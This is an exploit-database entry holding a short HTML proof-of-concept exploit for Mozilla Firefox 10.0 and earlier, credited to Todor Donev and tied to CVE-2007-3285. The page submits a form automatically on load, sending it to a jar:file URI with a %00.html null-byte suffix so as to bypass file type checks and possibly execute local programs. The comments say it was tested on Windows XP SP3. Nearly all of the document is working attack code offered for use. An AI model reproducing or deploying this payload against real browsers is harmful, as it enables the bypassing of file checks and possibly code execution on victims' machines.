mozilla firefox <= 10.0 local null byte bypass file check execution exploit



EKU-ID: 1459 CVE: 2007-3285 OSVDB-ID:
Author: Todor Donev Published: 2012-02-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit -->
<!-- -->
<!-- Vuln risk level: Medium -->
<!-- Author: Todor Donev -->
<!-- Author mail: todor.donev@@gmail.com -->
<!-- -->
<!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: -->
<!-- URI with a dangerous extension.-->
<!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more   -->
<!-- -->
<!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN -->
<!-- -->
<!-- Greetz Tsvetelina Emirska again.. =) -->
<!-- -->
<html>
<body onLoad=javascript:document.form.submit()>
<form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form">
</form>
</body>
</html>
<!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->